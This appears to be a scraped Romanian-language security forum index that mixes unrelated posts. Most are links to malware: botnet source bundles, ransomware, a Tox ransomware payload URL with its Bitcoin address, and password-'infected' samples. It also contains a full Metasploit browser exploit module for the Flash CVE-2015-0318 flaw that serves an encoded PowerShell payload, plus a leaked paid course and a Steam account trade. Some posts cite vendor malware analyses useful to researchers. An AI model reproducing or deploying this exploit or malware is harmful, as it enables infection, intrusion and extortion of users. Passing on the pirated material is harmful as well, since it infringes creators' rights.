Search the Community

O mica colectie de boti pentru voi. Bot Bundle 1 - ( includes over 150 bots with source code and moded versions): OSMDB-BOTNET-PACK-1.zip - Speedy Share - upload your files here Bot Bundle 2 - ( 155 bots): OSMDB-BOTNET-PACK-2.zip - Speedy Share - upload your files here Bot Bundle 3 - ( 53 bots and ransomware ): OSMDB-BOTNET-PACK-3.zip - Speedy Share - upload your files here Bot Bundle 4 - ( urxbot, Spybot, sdbot, rxbot, rbot, phatbot, litmus, gtbot, forbot, evilbot, darkirc, agobot, acebot, jbot, microbot, blueeyebot, icebot, q8bot, happybot,): OSMDB-BOTNET-PACK-4.zip - Speedy Share - upload your files here

Threat Spotlight: Rombertik – Gazing Past the Smoke, Mirrors, and Trapdoors Download standard pass Download infected Source

leak source: How I Make $6,000+ a Month Making Apps Without Coding! - Thieves-Team udemy: https://www.udemy.com/creating-profitable-ios-and-android-apps-without-code/ download: GirlShare - Download creating-profitable-ios-and-android-apps-without-code.rar

source : NASA: We Are Going to Europa

Why MariaDB Replication? source : Setup MariaDB Master-Slave Replication In CentOS 7

source : https://www.dionach.com/blog/easily-grabbing-microsoft-sql-server-password-hashes

Dau contul steam pe un key de counter-strike source! Contul e din 7 august 2012.

Dissecting the Linux/Moose malware http://www.welivesecurity.com/wp-content/uploads/2015/05/Dissecting-LinuxMoose.pdf ( PDF ) Download Source

https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Nivdor-A/detailed-analysis.aspx Infection vector via fake download. https://www.virustotal.com/en/url/3017aa5a0039f5eca181f56f69a29cb178eb621c0884b0380c4284a720ff7e1f/analysis/1432720854/ https://malwr.com/analysis/YzJjMjJiNDRiNWU0NDc2ODg5MzA4ODk0MWFiOGFlOWQ/ ThreatExpert Report https://www.virustotal.com/en/file/2f24ef96a1ed3ca05632f221ff17e8412728bc50b4f7c30a78528f89319b198b/analysis/1432718970/ Download infected Source

Meet ‘Tox': Ransomware for the Rest of Us ~ https://blogs.mcafee.com/mcafee-labs/meet-tox-ransomware-for-the-rest-of-us https://www.virustotal.com/en/file/f1384ff19a870f5aa718486666a14e88873d79eaea5725e3a2097b2d9fd9a320/analysis/1432628218/ hxxp://toxicola7qwv37qj.onion/downloads/ransom_50.00_dol_df410f19157f591860e1633b85dfb50b.scr https://malwr.com/analysis/MWExODFmZjM5YjZlNDQ5ODkxYzBkOTk1ZmMzOTcyYzI/ ThreatExpert Report https://blockchain.info/en/address/1KKGLjfDpVtNXymtTkU3PiiCpkJ532cLko Download Pass: infected Source

.

Win32k Elevation of Privilege Vulnerability. Allows code to be executed in kernel mode. Used by malware to target Windows 7. Apply MS15-051 for fix. https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html https://github.com/hfiref0x/CVE-2015-1701 Download pass: exploit Source

Infect files on removable disks and remote network drives. Description Virus:Win32/Ursnif VT: https://www.virustotal.com/en/file/8fa8122cfa52d7ff7fd8d918ccc9089a1762420c23edb6c50e8573456bfcdde3/analysis/1430975102/ https://www.virustotal.com/en/file/9bd91d207911b08489079c3927478b824b7948b741e1b6221339893581e4e9cb/analysis/1430976279/ Download Malware Pass: infected Source

mentioned in a nytimes article that schneier linked to. Two samples (prod + dev), for OSX and Win32. Does anti-vm, has some keylogging support, etc. Can't seem to attach, so here's a zippyshare link. Zippyshare.com Pass: infected https://www.virustotal.com/en/file/b27d29f30ecac80e15993fd1ba670bdcfc60f986e60d54e6a0cfb10f1c27bbc9/analysis/1430392133/ https://www.virustotal.com/en/file/48b36cedebe6d883f43b83e677449fc684f1eda4f8d63ab4eaaa3d4877389b85/analysis/1430392219/ Source

Reports by Eset: Unboxing Linux/Mumblehard: Muttering spam from your servers http://www.welivesecurity.com/wp-content/uploads/2015/04/mumblehard.pdf Download Source

Project Description Tera Term is Tera Term Pro 2.3 succession version and is being officially recognized by the original author. Tera Term is open source free software terminal emulator supporting UTF-8 protocol. Now TTSSH supports SSH2 protocol (Original version supports SSH1). B?ie?a?i de la CISCO îl mai folosesc Deci cu progr?melu te conectezi la ce vrea mu?chiule?ul t?u , ssh , telnet etc.. Source: Tera Term Open Source Project Download: Download Files List - Tera Term - SourceForge.JP //:Edit: Version 4.86

Diaphora, a program diffing plugin for IDA (by joxeankoret) https://github.com/joxeankoret/diaphora Source

Modular Everything in the browser is a module, a web-app running in its own process. Construct your own browsing experience by selecting the right modules for you. Hackable Want vertical tabs? Write some JS & CSS! Customised autocomplete engine? JS! Every behavior is programmatic and exposed through APIs. Open source The entire technology stack is open source. Modify existing modules and you can create your own to extend the behavior of Breach. Getting Involved Homepage: Breach - A new modular Browser Mailing list: breach-dev@googlegroups.com IRC Channel: #breach on Freenode You can find a list of Modules available or under developement here: List of Modules Runing Breach on Linux See instructions here: Running Breach on Linux Link: https://github.com/breach/breach_core/ Source: TF

Source: https://github.com/SecurityObscurity/cve-2015-0313 PoC: http://www.exploit-db.com/sploits/36491.zip Adobe Flash vulnerability source code (cve-2015-0313) from Angler Exploit Kit Reference: Trend Micro Discovers New Adobe Flash Zero-Day Exploit Used in Malvertisements Malware don't need Coffee: CVE-2015-0313 (Flash up to 16.0.0.296) and Exploit Kits https://helpx.adobe.com/security/products/flash-player/apsa15-02.html Source: http://www.exploit-db.com/exploits/36491/

Hello, and some more of this bad stuff. Download infected Source

Some more of cryptolocker copycats DOWNLOAD Pass: infected Source

pyClamd is a python interface to Clamd (Clamav daemon). By using pyClamd, you can add virus detection capabilities to your python software in an efficient and easy way. Instead of pyClamav which uses libclamav, pyClamd may be used by a closed source product. Changes: This version is compatible with python 3 (tested with 3.2.3) and python 2 (tested 2.7.3). The API for this new version is now object oriented. Useful classes are ClamdNetworkSocket and ClamdUnixSocket. Download

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking CLASSID = 'd27cdb6e-ae6d-11cf-96b8-444553540000' include Msf::Exploit::Powershell include Msf::Exploit::Remote::BrowserExploitServer def initialize(info={}) super(update_info(info, 'Name' => "Adobe Flash Player PCRE Regex Vulnerability", 'Description' => %q{ This module exploits a vulnerability found in Adobe Flash Player. A compilation logic error in the PCRE engine, specifically in the handling of the \c escape sequence when followed by a multi-byte UTF8 character, allows arbitrary execution of PCRE bytecode. }, 'License' => MSF_LICENSE, 'Author' => [ 'Mark Brand', # Found vuln 'sinn3r' # MSF ], 'References' => [ [ 'CVE', '2015-0318' ], [ 'URL', 'http://googleprojectzero.blogspot.com/2015/02/exploitingscve-2015-0318sinsflash.html' ], [ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=199' ] ], 'Payload' => { 'Space' => 1024, 'DisableNops' => true }, 'DefaultOptions' => { 'Retries' => true }, 'Platform' => 'win', 'BrowserRequirements' => { :source => /script|headers/i, :clsid => "{#{CLASSID}}", :method => "LoadMovie", :os_name => OperatingSystems::Match::WINDOWS_7, :ua_name => Msf::HttpClients::IE, # Ohter versions are vulnerable but .235 is the one that works for me pretty well # So we're gonna limit to this one for now. More validation needed in the future. :flash => lambda { |ver| ver == '16.0.0.235' } }, 'Targets' => [ [ 'Automatic', {} ] ], 'Privileged' => false, 'DisclosureDate' => "Nov 25 2014", 'DefaultTarget' => 0)) end def exploit # Please see data/exploits/CVE-2015-0318/ for source, # that's where the actual exploit is @swf = create_swf super end def on_request_exploit(cli, request, target_info) print_status("Request: #{request.uri}") if request.uri =~ /\.swf$/ print_status("Sending SWF...") send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'}) return end print_status("Sending HTML...") tag = retrieve_tag(cli, request) profile = get_profile(tag) profile[:tried] = false unless profile.nil? # to allow request the swf send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) end def exploit_template(cli, target_info) swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" target_payload = get_payload(cli, target_info) psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true}) b64_payload = Rex::Text.encode_base64(psh_payload) html_template = %Q|<html> <body> <object classid="clsid:#{CLASSID}" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" /> <param name="movie" value="<%=swf_random%>" /> <param name="allowScriptAccess" value="always" /> <param name="FlashVars" value="sh=<%=b64_payload%>" /> <param name="Play" value="true" /> <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/> </object> </body> </html> | return html_template, binding() end def create_swf path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2015-0318", "Main.swf" ) swf = ::File.open(path, 'rb') { |f| swf = f.read } swf end end Source

Two critical bugs in the commonly used Apache ActiveMQ open source messaging and Integration Patterns server are leaving businesses open to denial-of-service (DoS) and brute force cyber attacks. Researchers at MWR InfoSecurity Labs reported identifying the bugs, warning they affect Apache ActiveMQ versions 5.0.0 to 5.10.0 and Apache ActiveMQ Apollo versions 1.0 to 1.7. The flaws reportedly stem from the way Apache ActiveMQ performs Lightweight Directory Access Protocol (LDAP) authentication. "A vulnerability was identified in ActiveMQ in the way it handles content-based subscriptions, which allows an adversary to trigger processing of XML external entities (XXE)," read the advisory. "Apache ActiveMQ Apollo, which is another MQ implementation built for reliability and performance and originally based on ActiveMQ, was also found to be affected by this vulnerability." The researchers added the flaws are dangerous as they could be exploited for a variety of purposes. "In order to successfully exploit this vulnerability, an attacker has to act on behalf of both a publisher and a consumer," read the advisory. "An attacker who is able to push and pull from a message queue can use this flaw to perform DTD-based DoS attacks, server-side request forgery or read local files, accessible to the user running the MQ broker, from the server." It is currently unclear whether hackers are actively exploiting the flaw. MWE InfoSecurity had not responded to V3's request for comment at the time of publishing. The flaw is dangerous as Apache ActiveMQ is a commonly used open source message broker service. Written in Java, Apache ActiveMQ is designed to facilitate communications between multiple clients or servers. The news follows the discovery of several critical flaws affecting other commonly used open source tools and services. Researchers reported uncovering the notorious Heartbleed flaw in April 2014. Heartbleed is a flaw in the OpenSSL implementation of the Transport Layer Security protocol used by open source web servers such as Apache and Nginx, which host around 66 percent of all sites. In a recent interview with V3, Maarten Ectors, Canonical's vice president of next-generation networks and proximity cloud, argued the nature of open source software development means further Heartbleed-level flaws will be discovered in the very near future. Source

Brackets - A modern, open source code editor that understands web design.